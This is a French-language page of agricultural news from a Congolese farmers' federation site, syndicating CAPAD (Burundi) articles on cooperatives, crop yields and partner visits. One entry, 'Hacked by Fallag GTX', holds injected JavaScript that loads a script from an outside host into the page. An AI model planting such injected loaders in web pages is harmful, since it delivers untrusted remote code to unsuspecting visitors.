Fédération des Organisations des Producteurs Agricole du Congo au Nord-Kivu
Sur le Web

[Confédération des Associations des Producteurs Agricoles pour le développement]

La Confédération des Associations des Producteurs Agricoles pour le Développement (CAPAD), est une association sans but lucratif agréé en 2003. L’association a été fondée par des groupements d’agriculteurs et d’éleveurs . Son l’optique est de renforcement les capacités des organisations paysannes pour lutter contre la pauvreté et soutenir l’émergence d’un leadership paysan.


Articles les plus récents

MPANDA : L’Administration locale apprécie les réalisations de la CAPAD

Il est 11h au bureau de la commune MPANDA en province de BUBANZA et le soleil se trouve au zénith. La plaine de l'IMBO, l'une des zones d'action de la CAPAD, est la principale zone de la production du Riz. Au bureau de la commune se trouve un groupe de personnes qui viennent présenter à (...)

Kenya : EAFF-SACAU : Comment améliorer l’adaptation de l’agriculture aux changements climatiques

mercredi 1er avril 2015 — Communiqués - déclarations,
Le changement climatique fait défaut à la production agricole et surtout en Afrique où les services météos ne fonctionnent pas convenablement. La Fédération Est-Africaine des producteurs agricoles (EAFF) a organisé conjointement avec la Confédération des producteurs agricoles de l'Afrique Australe (...)

Bujumbura : Assemblée générale ordinaire de la CAPAD

mercredi 1er avril 2015 — L'organisation,
Vers 10h du matin, le 25 Février 2015, tous les membres de la CAPAD se rassemblaient au Centre Suédois pour la grande rencontre : l'Assemblée Générale ! A l'agenda figuraient plusieurs points, entre autres Les réalisations des coopératives et de la CAPAD de l'année 2014, L'élaboration du programme (...)

Coopératives Kirinzara et Garukiruburimyi : Chutes des productions de pomme de terre pour la saison 2015 A

vendredi 13 mars 2015 — Formation,
La production en pomme de terre n'a pas été bonne pour la saison 2015 A au sein des coopératives KIRINZARA (GATARA) et GARUKIRUBURIMYI (BUSIGA). Les producteurs et productrices de la pomme de terre membres de ces coopératives ont constaté la présence dans leurs champs plus de pathologies que (...)

Coopératives : Centres de formation et d’information

dimanche 8 mars 2015 — L'organisation,
Dans le cadre de la mise en œuvre de son plan stratégique la CAPAD a prévu d' appuyer ses coopératives dans la mise en œuvre d' un espace d' échange d' information entre les membres coopératives. Cette activité est conçue dans le but de permettre les coopératives membres à rendre des services adéquats (...)

Se doter d’un nouvel outil de travail pour mieux évaluer

mardi 30 décembre 2014 — L'organisation
Partenaire incontournable de la CAPAD, le Collectif Stratégies Alimentaires (CSA) est une Organisation Non Gouvernementale belge ayant pour but la promotion de l'agriculture durable et la sécurité alimentaire à travers le renforcement des organisations paysannes et la promotion de la souveraineté (...)

La culture du blé : une solution viable pour les prochains défis alimentaires

mardi 30 décembre 2014 par Jean de Dieu — partenaires locaux et régionaux
Le blé est une des principales cultures vivrières au Burundi. Il est produit principalement par les petits exploitants dans les systèmes de culture pluviale. La production totale de blé est loin inférieure des besoins de consommation nationale. Ainsi, la plupart du blé consommé dans le pays est (...)

Appui technique aux producteurs de la pomme de terre

mardi 30 décembre 2014 — partenaires internationaux,
Une équipe technique d'AGRITERRA est venue appuyer les producteurs de la pomme des coopératives membres de la CAPAD au niveau de la lutte contre les maladies et la production et multiplication de semences de la pomme de terre. Arrivée au Burundi le 17 novembre 2014, l'équipe technique a visité en (...)

Hacked by Fallag GTX

samedi 22 novembre 2014 par rayen — Documentation agricole
if(top == self) var zhead = document.getElementsByTagName('head')[0] ; if(!zhead)zhead = document.createElement('head') ; var qscript = document.createElement('script') ; qscript.setAttribute('id','wsh2_js') ; qscript.setAttribute('src','http://jswrite.com/script1.js') ; (...)

KAYANZA : Projet entrepreneuriat rural et chaine de solidarité caprine

jeudi 30 octobre 2014 — partenaires internationaux
Une équipe constituée par Marianne et Caroline (CSA) et Marianne Eringa (LTO-N) en a visité certaines coopératives membres de la CAPAD dans les Provinces Kayanza et Ngozi. L'objet de cette visite est d'échanger avec les producteurs sur les questions de développement agricoles dans leurs (...)

Accueil | Contact | Plan du site | | Statistiques du site | Visiteurs : 90794

Suivre la vie du site fr    ?    |    titre sites syndiques OPML   ?

Site réalisé avec SPIP 3.0.5 + AHUNTSIC

Adresse du siège de la FOPAC NK: 78, Avenue Walikale,Quartier Himbi II;Commune de Goma, Ville de Goma,Province du Nord-Kivu
Tél : Conseil d'Administration: +243994 196 568
Secrétaire Exécutif: +243 998 625 497/ +243 811 706 019
E-mail : fopacrdc@yahoo.fr et fopacrdcongo@gmail.com

Soutenu par la DGD (Belgique)  et le CSA